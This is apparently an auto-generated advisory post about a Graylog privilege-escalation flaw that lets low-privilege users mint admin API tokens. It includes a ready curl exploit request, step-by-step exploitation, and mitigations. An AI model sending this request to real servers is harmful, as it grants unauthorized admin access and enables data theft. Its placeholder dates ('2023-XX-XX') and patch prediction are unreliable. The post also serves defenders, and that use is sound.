Listen to this Post
How the CVE Works
The vulnerability in Graylog allows authenticated users to create API tokens for any user, including administrators, due to insufficient permission checks in the REST API. An attacker with a valid user account can craft malicious requests to /api/users/{user_id}/tokens/{token_name}, generating tokens with elevated privileges. This bypasses intended restrictions, enabling unauthorized administrative access.
DailyCVE Form
Platform: Graylog
Version: <6.2.0
Vulnerability: Privilege Escalation
Severity: Critical
Date: 2023-XX-XX
Prediction: Patch expected by 2023-XX-XX
What Undercode Say
Check existing API tokens curl -X GET -H "Authorization: Bearer <ADMIN_TOKEN>" http://graylog/api/users/tokens Exploit request (malicious) curl -X POST -H "X-Requested-By: attacker" -H "Authorization: Bearer <USER_TOKEN>" http://graylog/api/users/admin/tokens/exploit_token
How Exploit
1. Authenticate with a low-privilege account.
2. Send crafted POST request to `/api/users/admin/tokens/{token_name}`.
3. Use generated token for admin access.
Protection from this CVE
- Upgrade to Graylog ≥6.2.0.
- Disable “Allow users to create personal access tokens” in System > Configuration.
- Rotate all API tokens post-patch.
Impact
- Unauthorized admin access.
- Potential full system compromise.
- Data exfiltration or service disruption.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
